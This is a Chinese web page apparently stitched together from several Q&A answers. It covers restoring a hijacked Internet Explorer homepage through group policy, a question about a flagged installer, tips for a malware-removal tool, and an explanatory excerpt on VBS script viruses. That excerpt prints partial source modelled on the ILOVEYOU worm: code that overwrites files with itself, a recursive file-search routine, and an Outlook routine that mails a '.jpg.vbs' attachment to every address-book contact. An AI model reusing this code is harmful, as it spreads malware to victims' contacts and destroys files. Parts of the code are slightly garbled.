石榴攻略网带你了解瑞星注册表修复工具 ,希望本文能帮到你。
IE浏览器主页被恶意更改怎么办?
IE浏览器的主页被恶意修改改正方法:
说明:方法一对XP、Vista、Win7通用,方法二对win7有用(永久锁定)
方法一:
1、开始-->运行-->输入gpedit.msc即可打开组策略编辑器
2、依次展开用户配置-->管理模块-->Windows组件-->Internet Explorer
3、在右侧窗口找到“禁用更改主页设置”这一项,双击,出现对话框
4、选择“已启用”,并在下面的输入框中输入“about:Tabs”(不含引号,即把主页设为空选项卡)或者想设的网页如,然后确定,最后单击“文件”-->“退出”
方法二:
1、首先点击“开始”菜单→“运行”,输入“gpedit.msc”确定
2、依次展开“用户配置”→“管理模板”→“Windows组件”→“InternetExplorer”,在窗口的右侧找到“禁用更改主页设置”这一项,双击打开,在设置标签中选中“已启用”,单击“确定”关闭“组策略”
3、现在IE首页已经被锁定了,打开“Internet选项”时会发现“主页”这一项显示为灰色,处于无法修改状态
[250分的问题]关于病毒样本和病毒分析和病毒分析工具、方法
1病毒样本要从哪里来
就病毒代码的存在形式来说,有两种,一种是病毒自身是个独立的程序文件,另一种是它附着在正常的程序文件上,即所谓的感染,所以,病毒样本其实就是指怀疑为病毒或染毒的文件
不过实际上,病毒程序并不一定象你说的那样清清楚楚的有个主程序,现在的病毒木马,都是几个程序文件组成,相互保护、相互调用运行,它们都是病毒样本
病毒的发作状态,有些是能察觉出来的,比如:增加了进程、电脑或网速变慢、系统运行报错等等,有些病毒发作时,几乎没有外在表现,很隐蔽
病毒其实就是一段程序,一是一,二是二,一点也不可怕和神秘,只要不运行它,它就是死的,非常安全,如果你怕在提取过程中误运行了病毒,可以把病毒程序文件的扩展名改一下,改为不可被执行或被直接打开的扩展名即可,或根本就不要扩展名,这样在拷贝、传输过程中就非常安全了
2要怎么分析
(1)(病毒分析祥解)
(2)一、Vbs脚本病毒的特点及发展现状
VBS病毒是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点:
1.编写简单,一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。
2.破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃,网络发生严重阻塞。
3.感染力强。由于脚本是直接解释执行,并且它不需要像PE病毒那样,需要做复杂的PE文件格式处理,因此这类病毒可以直接通过自我复制的方式感染其他同类文件,并且自我的异常处理变得非常容易。
4.传播范围大。这类病毒通过htm文档,Email附件或其它方式,可以在很短时间内传遍世界各地。
5.病毒源码容易被获取,变种多。由于VBS病毒解释执行,其源代码可读性非常强,即使病毒源码经过加密处理后,其源代码的获取还是比较简单。因此,这类病毒变种比较多,稍微改变一下病毒的结构,或者修改一下特征值,很多杀毒软件可能就无能为力。
6.欺骗性强。脚本病毒为了得到运行机会,往往会采用各种让用户不大注意的手段,譬如,邮件的附件名采用双后缀,如.jpg.vbs,由于系统默认不显示后缀,这样,用户看到这个文件的时候,就会认为它是一个jpg图片文件。
7.使得病毒生产机实现起来非常容易。所谓病毒生产机,就是可以按照用户的意愿,生产病毒的机器(当然,这里指的是程序),目前的病毒生产机,之所以大多数都为脚本病毒生产机,其中最重要的一点还是因为脚本是解释执行的,实现起来非常容易,具体将在我们后面谈及。
正因为几个特点,脚本病毒发展异常迅猛,特别是病毒生产机的出现,使得生成新型脚本病毒变得非常容易。
二、Vbs脚本病毒原理分析
1.vbs脚本病毒如何感染、搜索文件
VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而爱虫病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理:
以下是文件感染的部分关键代码:
Set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象
set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件(即病毒本身)
vbscopy=self.readall ' 读取病毒全部代码到字符串变量vbscopy……
set ap=fso.opentextfile(目标文件.path,2,true) ' 写打开目标文件,准备写入病毒代码
ap.write vbscopy ' 将病毒代码覆盖目标文件
ap.close
set cop=fso.getfile(目标文件.path) '得到目标文件路径
cop.copy(目标文件.path & ".vbs") ' 创建另外一个病毒文件(以.vbs为后缀)
目标文件.delete(true) '删除目标文件
上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。
下面我们具体分析一下文件搜索代码:
'该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
sub scan(folder_) 'scan函数定义,
on error resume next '如果出现错误,直接跳过,防止弹出错误窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 当前目录的所有文件集合
for each file in filesext=fso.GetExtensionName(file) '获取文件后缀
ext=lcase(ext) '后缀名转换成小写字母
if ext="mp5" then '如果后缀名是mp5,则进行感染。请自己建立相应后缀名的文件,最好是非正常后缀名 ,以免破坏正常程序。
Wscript.echo (file)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders '搜索其他目录;递归调用
scan( )
scan(subfolder)
next
end sub
上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。
2.vbs脚本病毒通过网络传播的几种方式及代码分析
VBS脚本病毒之所以传播范围广,主要依赖于它的网络传播功能,一般来说,VBS脚本病毒采用如下几种方式进行传播:
1)通过Email附件传播
这是一种用的非常普遍的传播方式,病毒可以通过各种方法拿到合法的Email地址,最常见的就是直接取outlook地址簿中的邮件地址,也可以通过程序在用户文档(譬如htm文件)中搜索Email地址。
下面我们具体分析一下VBS脚本病毒是如何做到这一点的:
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") //创建一个OUTLOOK应用的对象
If outlookApp= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI") //获取MAPI的名字空间
Set addrList= mapiObj.AddressLists //获取地址表的个数
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count //获取每个地址表的Email记录数
For addrEntIndex= 1 To addrEntCount //遍历地址表的Email地址
Set item = outlookApp.CreateItem(0) //获取一个邮件对象实例
Set addrEnt = addr.AddressEntries(addrEntIndex) //获取具体Email地址
item.To = addrEnt.Address //填入收信人地址 item.Subject = "病毒传播实验" //写入邮件标题
item.Body = "这里是病毒邮件传播测试,收到此信请不要慌张!" //写入文件内容
Set attachMents=item.Attachments //定义邮件附件
attachMents.Add fileSysObj.GetSpecialFolder(0) & "\test.jpg.vbs"
item.DeleteAfterSubmit = True //信件提交后自动删除
If item.To <> "" Then
item.Send //发送邮件
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //病毒标记,以免重复感染
End If
Next
End If
Next
End if
End Function
太多了~你能不能自己去看?百度发不来~还有250分
setupDTSB.exe到底是不是病毒?
应该是从setupDTSB.exe中查出感染了Adware.SaveNow。危险级别-中。然后那个应用程序就被隔离了。
(恶意软件清理助手〕
关于〔恶意软件清理助手〕的使用:
注意软件设置(该软件可清理绝大部分恶意软件和被恶意修改的设置)
注意备份注册表(该软件的系统工具里有此功能)
系统清理→恶意软件清理:
〔开始检测〕进行恶意软件的检测,钩选需要修复的项目
〔开始清理〕进行所选项目的修复.建议使用强制清理模式
系统工具→浏览器修复:
浏览器修复(根据需要钩选)→修复选中项目
IE右键菜单清理(根据需要钩选)→修复选中项目
先检测 检测后被发现的恶意软件名字会变成红色
钩选不需要的 比如检测到了3721上网助手
你并不需要它 就钩选它
把所有不需要的钩选 把所有需要的取消钩选
然后点〔开始清理〕
〔浏览器修复〕可以修复被恶意修改的浏览器设置
比如主页被修改成某个网站 之类的
〔IE右键菜单清理〕可以清理右键菜单中被恶意添加的项目
比如彩铃、聊天、网站 之类的
建议使用以下工具来更有效保护IE:
Google工具栏 + 百度超级搜霸
可以方便地屏蔽掉绝大部分弹出窗口及漂浮窗口等
并且还有其它实用功能
Google工具栏
百度超级搜霸
辅助工具软件:
瑞星注册表修复工具
金山毒霸IE修复工具
〔恶意软件清理助手〕
并查看和调整如下设置:
工具→Internet 选项→安全→Internet→自定义级别→重置自定义设置(重置为:安全级别-中)→重置→确定→确定
